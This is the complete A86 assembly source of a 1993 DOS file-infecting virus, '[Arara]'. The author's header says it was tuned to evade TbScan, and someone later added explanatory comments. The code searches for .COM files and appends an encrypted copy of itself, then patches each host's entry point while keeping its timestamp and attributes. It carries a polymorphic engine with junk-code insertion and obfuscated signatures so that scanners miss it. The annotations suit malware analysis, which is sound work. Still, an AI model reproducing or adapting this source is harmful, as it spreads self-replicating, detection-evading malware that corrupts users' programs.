;
		; [Arara] Virus
		; Generated by [TVG]
		; Minor modifications done to avoid heuristic detection by TbScan
		; Cloaked with a minor polymorphic protection device
		; Created on Monday November 11, 1993
		; Written for compilation in A86 pd assembler
		;
		; This is not a major virus, but I want to see how they react in the Virus
		; summary. Maybe they say it's from Bulgaria because of the language. Well,
		; if you want me to write something (fairly neutral) about satanism for a mag
		; then say it so. I try to keep it interesting...
		;
		;       John Tardy


		; Entry stub and start-up. In this first-generation listing the file begins
		; with a near jump to MAIN followed by a one-byte marker; the search/modify
		; routine below writes the same four-byte shape (JUMP + marker) over the
		; start of a host file.
		JMP	MAIN
		DB	'ž'			; marker byte: 4th byte of the file, tested before a file is modified
MAIN:		CALL	GETOFS			; pushes the run-time address of GETOFS
GETOFS:		MOV	BP,SP
		MOV	BP,SS:[BP]		; read that return address; it stays on the stack (never popped)
		PUSH	AX			; entry AX, popped again at ERROR before control moves to 100h
		SUB	BP,GETOFS		; BP = run-time address - assembled address (delta offset);
						; all later data references are written as SYMBOL[BP]
MAINVIR		EQU	$
		CALL	RANDOMIZE		; step the MT selector bytes and pick ENCRYPTVAL
		MOV	AX,[ORGPRG][BP]		; copy the four bytes saved in ORGPRG back to offset 100h
		LEA	DI,100H			; STOSW writes through ES, which is not set here -
		STOSW				; presumably ES = CS as at .COM start (confirm)
		MOV	AX,[ORGPRG][2][BP]
		STOSW
		MOV	AH,1AH			; INT 21h/1Ah: move the DTA to DS:FD00h so the find
		MOV	DX,0FD00H		; results do not overwrite the default DTA at 80h
		INT	21H
		CALL	CHANGE			; swap bytes 2 and 3 of FILESPEC: '*.OCM' becomes '*.COM'

		; Search/modify loop. AH = 4Eh (find first) on the first pass and 4Fh (find
		; next) when re-entered from EXEFILE. The matched name is taken from the DTA
		; name field at DS:FD1Eh (DTA FD00h + 1Eh). Observable file-system effects per
		; candidate: attributes cleared then restored, file opened read/write, and
		; time/date read then written back - so a modified file keeps its original
		; timestamp and attributes but grows in length.
		; Stack contract with CLOSE: attributes, time, date are pushed here in that
		; order and popped by CLOSE.
		MOV	AH,4EH
SEARCH:		LEA	DX,FILESPEC[BP]
		XOR	CX,CX			; attribute mask 0
		INT	21H
		JNC	NOERROR
		JMP	READY			; no (further) match: restore DTA and run the host
NOERROR:	MOV	AX,4300H		; INT 21h/4300h: get attributes of the found name
		MOV	DX,0FD1EH
		INT	21H
		PUSH	CX			; saved attributes (restored by CLOSE)
		MOV	AX,4301H		; set attributes to 0, which removes read-only
		XOR	CX,CX
		INT	21H
		MOV	AX,3D02H		; open read/write
		MOV	DX,0FD1EH
		INT	21H			; NOTE(review): carry is not checked after this or later calls
		XCHG	AX,BX			; BX = file handle
		MOV	AX,5700H		; get file time (CX) and date (DX)
		INT	21H
		PUSH	CX			; saved time (restored by CLOSE)
		PUSH	DX			; saved date (restored by CLOSE)
		MOV	AH,3FH			; read the first 4 bytes of the file into ORGPRG
		LEA	DX,ORGPRG[BP]
		MOV	CX,4
		INT	21H
		MOV	CX,W ORGPRG[BP]
		XOR	CX,0FFFFH		; compare against complemented constants so the plain
		CMP	CX,0B2A5H		; signature words do not appear in the code:
		JE	EXEFILE			; 0B2A5h = NOT 4D5Ah (bytes 'ZM')
		CMP	CX,0A5B2H		; 0A5B2h = NOT 5A4Dh (bytes 'MZ')
		JE	EXEFILE			; either EXE header signature: skip the file
		CMP	B ORGPRG[BP][3],'ž'	; 4th byte equals the marker: already modified, skip
		JE	EXEFILE
		MOV	AX,4202H		; seek to end of file; CWD gives DX = 0 because AX is positive
		XOR	CX,CX
		CWD
		INT	21H			; AX = low word of the file length (DX is not used afterwards)
		SUB	AX,3
		MOV	JUMP[1][BP],AX		; displacement of an E9 jump at offset 0 to the old end of file
		PUSH	BX			; keep the handle across ENCRYPT
		PUSH	AX
		CALL	CHANGE			; swap FILESPEC back so the copy written out holds '*.OCM'
		MOV	DS,CS
		LEA	SI,MAIN[BP]		; source: the running body, MAIN..START
		MOV	CX,VIRLEN
		MOV	ES,CS
		LEA	DI,START[BP]		; output buffer: memory directly after the body
		POP	DX
		ADD	DX,103H			; DX = (length - 3) + 103h = length + 100h, the offset at
						; which the appended bytes load in a .COM image
		MOV	AX,3			; stored by ENCRYPT into AMOUNT (junk-count mask)

		CALL	ENCRYPT			; returns CX = decryptor + encoded body length

		POP	BX
		MOV	AH,40H			; write CX bytes from START; the file pointer is still at
		MOV	DS,CS			; end of file from the 4202h seek, so this appends
		LEA	DX,START[BP]
		INT	21H

		MOV	AX,4200H		; seek back to offset 0
		XOR	CX,CX
		CWD
		INT	21H
		MOV	AH,40H			; overwrite the first 4 bytes with JUMP: E9, disp16, marker
		LEA	DX,JUMP[BP]
		MOV	CX,4
		INT	21H
		CALL	CLOSE
		JMP	READY			; stop after one modified file per run
EXEFILE:	CALL	CLOSE			; skipped file: restore time/date and attributes, close
		MOV	AH,4FH			; find next
		JMP	SEARCH
; Exit path: put the DTA back at the default DS:0080h and continue at offset 100h,
; where the four bytes from ORGPRG were restored at start-up.
READY		EQU	$
ERROR:		MOV	AH,1AH			; INT 21h/1Ah: set DTA to DS:0080h
		MOV	DX,80H
		INT	21H
		MOV	DS,CS
		POP	AX			; AX as pushed right after GETOFS
		MOV	BX,0FEFFH
		XOR	BX,0FFFFH		; BX = 0100h, formed without the literal in the code
		JMP	BX			; the return address left by CALL GETOFS is still on the stack here
; CLOSE - restore a file's time/date and attributes and close it.
; In:    BX = file handle; the caller's stack holds, below the return address,
;        date (top), time, attributes - the values pushed at NOERROR.
; Out:   DS = ES = CS. The three stack arguments are consumed.
; The return address is popped into SI first so the arguments can be popped,
; then pushed back for RET. The function numbers 5701h and 4301h are formed
; with INC AX rather than written as literals.
CLOSE:		POP	SI			; return address
		POP	DX			; saved date
		POP	CX			; saved time
		MOV	AX,5700H
		INC	AX			; AX = 5701h: set file time/date
		INT	21H
		MOV	AH,3EH			; close handle BX
		INT	21H
		POP	CX			; saved attributes
		MOV	AX,4300H
		INC	AX			; AX = 4301h: set attributes of the name at DS:FD1Eh
		MOV	DX,0FD1EH
		INT	21H
		MOV	DS,CS
		MOV	ES,CS
		PUSH	SI			; put the return address back
		RET
		; Name string. It lies inside MAIN..START, so it is encoded along with the
		; rest of the body before being written to a file.
		DB	'[ARARA]'
; CHANGE - swap the two bytes at WEXL (= FILESPEC+2), toggling the search mask
; between the stored form '*.OCM' and the usable form '*.COM'. Calling it twice
; restores the original. Clobbers AX.
CHANGE:		MOV	AX,W WEXL[BP]
		XCHG	AL,AH
		MOV	W WEXL[BP],AX
		RET

		;---------------------------------------------------------------------------
		;
		; Encryption engine
		;
		;---------------------------------------------------------------------------

; RANDOMIZE - advance the decryptor-shape selectors and choose the key byte.
; 1. Every byte of MT is incremented by one.
; 2. Any MT[i] that is not below MTMAX[i] (unsigned) is reset to 0, so each
;    selector cycles 0..MTMAX[i]-1 from one run to the next; the selection is a
;    counter, not a random draw.
; 3. ENCRYPTVAL is set to the byte at 0000:046Ch (low byte of the BIOS timer
;    tick count), polling until that byte is non-zero.
; Because MT lives inside MAIN..START, the stepped values are what ENCRYPT later
; copies into the written body.
; Clobbers AX, CX, SI; leaves DS = CS.
RANDOMIZE:	MOV	CX,MTLEN
INCREASE:	MOV	SI,CX
		INC	B MT[SI][-1][BP]	; index CX-1, walking the table from the end
		LOOP	INCREASE
CHECKIT:	MOV	CX,MTMAXLEN
CHECKVAL:	MOV	SI,CX
		MOV	AH,MT[SI][-1][BP]
		MOV	AL,MTMAX[SI][-1][BP]
		CMP	AH,AL
		JB	GOODVAL			; still within range
		MOV	B MT[SI][-1][BP],0	; wrap to 0
GOODVAL:	LOOP	CHECKVAL
		XOR	AX,AX
		MOV	DS,AX			; DS = 0 to reach the BIOS data area
NOTZERO:	MOV	AL,B DS:[046CH]
		OR	AL,AL
		JZ	NOTZERO			; busy-wait: a zero key is never used
		MOV	DS,CS
		MOV	ENCRYPTVAL[BP],AL
		RET

; Work variables for ENCRYPT.
DUMMY1		DW	0		; output position of the pointer-load operand (patched at the end)
DUMMY2		DW	0		; output position of the loop top (target of the final LOOP/LOOPNE)
CALNEWCX	DW	0		; start of the output buffer, used to compute lengths

; ENCRYPT - emit a variable decryptor followed by the encoded body.
; In:    AX = value stored into AMOUNT (patches an instruction in INSERTGARBAGE)
;        CX = number of bytes to encode, SI = source, DI = output buffer
;        DX = base added to the decryptor length to form the pointer operand
;             (the caller passes host length + 100h)
; Out:   CX = total bytes written to the buffer; DI is left equal to CX
; Uses:  the MT selector bytes, read in order with LODSB, and ENCRYPTVAL.
; Emitted layout, with 0..n one-byte filler opcodes from INSERTGARBAGE between
; the pieces (this fixed order is what stays constant across generations):
;   1. VAL2T[sel1] + word          load a 16-bit immediate into AX/BX/DX/BP
;   2. VAL3SUB[sel2], VAL3T[..]    register-to-register op involving CX
;   3. VAL1T[sel3] + word          load the pointer register BX/SI/DI
;   4. VAL4T[sel4], VAL5T[..], key xor/add/sub byte [ptr], ENCRYPTVAL
;   5. VAL6T[sel3]                 inc ptr
;   6. VAL7T[sel6] + rel8          loop back to step 4
; followed by CX source bytes transformed with the inverse of step 4.
ENCRYPT:	PUSH	DS
		PUSH	SI
		PUSH	CX

		MOV	AMOUNT[BP],AX		; self-modifying store into INSERTGARBAGE

		MOV	COUNTLOOP[BP],CX

		MOV	CALNEWCX[BP],DI

		LEA	SI,MT[BP]		; SI now walks the selector bytes

		CALL	INSERTGARBAGE
		XOR	AX,AX

		LODSB				; selector 1
		PUSH	AX
		LEA	BX,VAL2T[BP]
		CALL	USETABLE		; emit the load opcode; AL = that opcode, AH = 0
		ADD	AX,W [COUNTLOOP][BP]	; word emitted = COUNTLOOP + the opcode byte just emitted
		STOSW
		LODSB				; selector 2
		PUSH	AX
		CALL	INSERTGARBAGE
		LEA	BX,VAL3SUB[BP]
		CALL	USETABLE		; emit the opcode of the CX-transfer instruction
		POP	AX			; selector 2
		SHL	AX,2
		POP	BX			; selector 1
		ADD	AX,BX			; index = selector2 * 4 + selector1 (XLAT uses AL only)
		LEA	BX,VAL3T[BP]
		CALL	USETABLE		; emit its ModRM byte
		CALL	INSERTGARBAGE

		LODSB				; selector 3: choice of pointer register
		PUSH	AX
		PUSH	AX
		LEA	BX,VAL1T[BP]
		CALL	USETABLE		; emit the pointer-load opcode
		MOV	DUMMY1[BP],DI		; remember where its operand goes
		STOSW				; placeholder word, overwritten below
		CALL	INSERTGARBAGE

		MOV	DUMMY2[BP],DI		; loop top
		LODSB				; selector 4
		LEA	BX,VAL4T[BP]
		CALL	USETABLE		; emit 80h or 82h
		POP	BX			; selector 3
		LODSB				; selector 5: operation
		MOV	FUNCTION[BP],AL
		SHL	AX,2
		ADD	AX,BX			; index = selector5 * 4 + selector3
		LEA	BX,VAL5T[BP]
		CALL	USETABLE		; emit the ModRM byte (operation + pointer register)
		MOV	AL,B [ENCRYPTVAL][BP]
		STOSB				; emit the key as the imm8 operand
		CALL	INSERTGARBAGE
		POP	AX			; selector 3
		LEA	BX,VAL6T[BP]
		CALL	USETABLE		; emit INC of the same pointer register
		LODSB				; selector 6
		LEA	BX,VAL7T[BP]
		CALL	USETABLE		; emit E0h or E2h
		MOV	AX,DI
		MOV	BX,DUMMY2[BP]
		SUB	AX,BX
		NOT	AX			; rel8 = loop top - (address after the displacement byte)
		STOSB
		PUSH	DI
		MOV	AX,CALNEWCX[BP]
		SUB	DI,AX			; DI = length of the decryptor just emitted
		ADD	DI,DX			; + base = offset of the encoded body
		MOV	AX,DI
		MOV	DI,DUMMY1[BP]
		STOSW				; patch the pointer-load operand
		POP	DI

		POP	CX			; original length
		POP	SI			; original source
		POP	DS

		; Encode CX bytes from DS:SI to ES:DI. FUNCTION names the decryptor's
		; operation, so the inverse is applied here: 0 -> XOR, 1 -> SUB, other -> ADD.
CODEIT:		LODSB
		CMP	B FUNCTION[BP],0
		JNE	WHATELSE1
		XOR	AL,ENCRYPTVAL[BP]
		JMP	NOELSE
WHATELSE1:	CMP	B FUNCTION[BP],1
		JNE	WHATELSE2
		SUB	AL,ENCRYPTVAL[BP]
		JMP	NOELSE
WHATELSE2:	ADD	AL,ENCRYPTVAL[BP]
NOELSE:		STOSB
		LOOP	CODEIT
		MOV	CX,CALNEWCX[BP]
		SUB	DI,CX
		MOV	CX,DI			; CX = bytes written since the buffer start
		RET

; USETABLE - emit one table entry.
; In:    BX = table offset, AL = index, DI = output position
; Out:   AL = DS:[BX+AL] (XLAT), stored at ES:[DI]; DI advanced by one
USETABLE:
		XLAT
		STOSB
		RET

; INSERTGARBAGE - emit a small, varying number of one-byte filler opcodes from
; RANDOMCODE at ES:DI.
; In:    DI = output position
; Out:   DI advanced by the number of bytes emitted; DS, SI, AX, CX restored.
;        BX is overwritten when at least one byte is emitted.
; The count is derived from the BIOS timer word at 0000:046Ch mixed with DI,
; SI, BP, CX and the word at CS:[DI+BP], then masked by the AND below.
INSERTGARBAGE:	PUSH	DS
		PUSH	SI
		PUSH	AX
		PUSH	CX
		PUSH	DS			; second DS/SI pair is popped early, before the emit loop
		PUSH	SI
		XOR	AX,AX
		MOV	DS,AX
		MOV	AX,WORD PTR DS:[046CH]
		ADD	AX,DI
		SUB	AX,SI
		ADD	AX,BP
		ADD	AX,WORD PTR CS:[DI][BP]
		ADD	AL,AH
		ADD	AX,CX
		AND	AX,02H
		; AMOUNT names the last two bytes of the AND above; ENCRYPT stores its AX
		; argument there (the caller passes 3). Presumably those bytes are the
		; instruction's 16-bit immediate, making the mask run-time patched - this
		; depends on the encoding the assembler chose; confirm against the binary.
AMOUNT		EQU	$-2
		MOV	CX,AX			; CX = number of filler bytes
		AND	AX,7H			; first table index
		POP	SI
		POP	DS			; DS restored before XLAT reads the table
		CMP	CX,0
		JE	NOGARBAGE
INSERT:		LEA	BX,RANDOMCODE[BP]
		CALL	USETABLE		; emit one filler byte; AL = that byte afterwards
		ADD	AX,DI
		ADD	AX,SI
		ADD	AX,WORD PTR CS:[DI][BP]
		AND	AX,7			; next index is 0..7, so only the first eight of the
		LOOP	INSERT			; nine RANDOMCODE bytes are reachable from this line
NOGARBAGE:	POP	CX
		POP	AX
		POP	SI
		POP	DS
		RET

; Selector limits. RANDOMIZE resets MT[i] to 0 once it is no longer below
; MTMAX[i], so each limit is the number of distinct values that selector takes.
; The "MT n" labels are the author's numbering (3 is skipped).
MTMAX		DB	4		; MT 0
		DB	10		; MT 1
		DB	3		; MT 2
		DB	2		; MT 4
		DB	3		; MT 5
		DB	2		; MT 6
		DB	6		; MT 7
MTMAXLEN	EQU	$-MTMAX

		; Selector bytes. ENCRYPT reads the first six in order with LODSB; the
		; seventh is stepped by RANDOMIZE but is not read by ENCRYPT in this listing.
MT		DB	0		; MT 0
		DB	0		; MT 1
		DB	0		; MT 2
		DB	0		; MT 4
		DB	0		; MT 5
		DB	0		; MT 6
		DB	0		; MT 7
MTLEN		EQU	$-MT

		; Offset Encrypted part (not referenced anywhere in this listing)
ENCOFS		DW	0

		; Counterloop decryption: byte count handed to ENCRYPT in CX
COUNTLOOP	DW	0

		; Encryption value: one-byte key, set by RANDOMIZE from the timer byte
ENCRYPTVAL	DB	0

		; Function: operation used by the emitted decryptor. CODEIT applies the
		; inverse when encoding (1 -> SUB, 2 -> ADD).
FUNCTION	DB	0		; 0=xor, 1=add, 2=sub (xchange in encr)

		; Opcode tables used by ENCRYPT to assemble the decryptor. The "MT n V/H"
		; tags are the author's; which selector indexes which table is visible in
		; ENCRYPT. For analysis, these tables enumerate every byte value that can
		; appear at each position of the plaintext decryptor in a modified file.
		;               MT 0
VAL1T		DB	0BBH,0BEH,0BFH	; Mov Bx,Si,Di (imm16): pointer register load

		;               MT 1
VAL2T		DB	0B8H,0BBH,0BAH,0BDH ; Mov Ax,Bx,Dx,Bp (imm16): value later moved into CX

		;               MT 2 V
		; Opcode of the register-to-register step: MOV, XCHG, XCHG, XOR, ADD, OR
		; in the "r/m16,r16" direction ...
VAL3SUB		DB	089H, 087H, 087H, 031H, 001H, 009H

		; ... and MOV, XOR, ADD, OR in the "r16,r/m16" direction.
		DB	08BH, 033H, 003H, 00BH ; new

		;               MT 1 H
		; ModRM byte for the opcode above, one row of four per VAL3SUB entry,
		; indexed row*4 + column. Every byte is a register-to-register form
		; (mod = 11) in which one operand is CX and the other is AX/BX/DX/BP.
VAL3T		DB	0C1H,0D9H,0D1H,0E9H ; Mov Ax,Bx,Dx,Bp       -> Cx
		DB	0C1H,0CBH,0CAH,0CDH ; Xchg Ax,Bx,Dx,Bp      -> Cx
		DB	0C1H,0D9H,0D1H,0E9H ; Xchg Ax,Bx,Dx,Bp      <- Cx
		DB	0C1H,0D9H,0D1H,0E9H ; Xor Ax,Bx,Dx,Bp       -> Cx
		DB	0C1H,0D9H,0D1H,0E9H ; Add Ax,Bx,Dx,Bp       -> Cx
		DB	0C1H,0D9H,0D1H,0E9H ; Or Ax,Bx,Dx,Bp        -> Cx

		DB	0C8H,0CBH,0CAH,0CDH ; new: rows for the four "r16,r/m16" opcodes
		DB	0C8H,0CBH,0CAH,0CDH ;
		DB	0C8H,0CBH,0CAH,0CDH ;
		DB	0C8H,0CBH,0CAH,0CDH ;



		;               MT 4 H
		; Opcode of the decode instruction: 80h or its alias 82h (op r/m8,imm8)
VAL4T		DB	080H,082H	; 00 / 0000

		;               MT 5 V
		;               MT 0 H
		; ModRM for the decode instruction, indexed operation*4 + pointer choice;
		; the operand is a byte at [BX], [SI] or [DI].
VAL5T		DB	037H,034H,035H,037H ; Xor Bx,Si,Di,bx
		DB	007H,004H,005H,007H ; Add Bx,Si,Di,bx
		DB	02FH,02CH,02DH,02FH ; Sub Bx,Si,Di,bx

		;               MT 0 H
VAL6T		DB	043H,046H,047H	; Inc Bx,Si,Di

		;               MT 6 H
VAL7T		DB	0E0H,0E2H	; Loop Equal Functions: LOOPNE (E0h) or LOOP (E2h)

		;               MT 7 H
		; One-byte fillers: CLD, CLC, NOP, STC, CMC / INT 3, STI, CS: prefix, CMC
RANDOMCODE	DB	0FCH,0F8H,090H,0F9H,0F5H ; Random code
		DB	0CCH,0FBH,02EH,0F5H


; Search mask, stored with two letters transposed; CHANGE swaps the bytes at
; WEXL to give '*.COM' while searching and swaps them back before the body is
; copied, so the literal '*.COM' is not present in the stored form.
FILESPEC	DB	'*.OCM',0
WEXL		EQU	FILESPEC+2
; Four-byte patch written at offset 0 of a modified file: E9h, 16-bit
; displacement (file length - 3), marker byte. These four bytes are written
; as-is, not passed through ENCRYPT.
JUMP		DB	0E9H
		DW	0
		DB	'ž'
; First four bytes of the host, read before the file is modified and copied
; back to offset 100h at start-up. The initial value begins with CDh 20h
; (INT 20h), so the first-generation file simply terminates.
ORGPRG		DB	0CDH,020H,'AR'

		;
		; The Eighteenth Enochian Key opens the gates of Hell and casts up Lucifer
		; and his blessing.
		;
		; Enochian
DB		13,10,'ILASA MICALAZODA OLAPIRETA IALPEREJI BELIORE: DAS ODO BUSADIRE OIAD OUOARESA'
DB		13,10,'CAOSAGO: CASAREMEJI LAIADA ERANU BERINUTASA CAFAFAME DAS IVEMEDA AQOSO ADOHO'
DB		13,10,'MOZ, OD MAOFASA. BOLAPE COMO BELIORETA PAMEBETA. ZODACARE OD ZODAMERANU! ODO'
DB		13,10,'CICALE QAA. ZODOREJE, LAPE ZODIREDO NOCO MADA, HOATHAHE SAITAN!'
		; English
		;   O thou mighty light and burning flame of comfort!, that unveilest the glory
		;   of Satan to the center of the Earth; in whom the great secrets of truth
		;   have their abiding; that is called in thy kingdom: "strength through joy,"
		;   and is not to be measured. Be thou a window of comfort unto me. Move there-
		;   fore, and appear! Open the mysteries of your creation! Be friendly unto me,
		;   for I am the same!, the true worshipper of the highest and ineffable King
		;   of Hell!
		; START marks the end of the body and the start of the scratch buffer that
		; ENCRYPT fills. Everything from MAIN up to here, including the text above
		; and the '[ARARA]' string, is encoded with a non-zero key before it is
		; written, so none of it appears literally in a modified file.
START		EQU	$



VIRLEN		EQU	$-MAIN

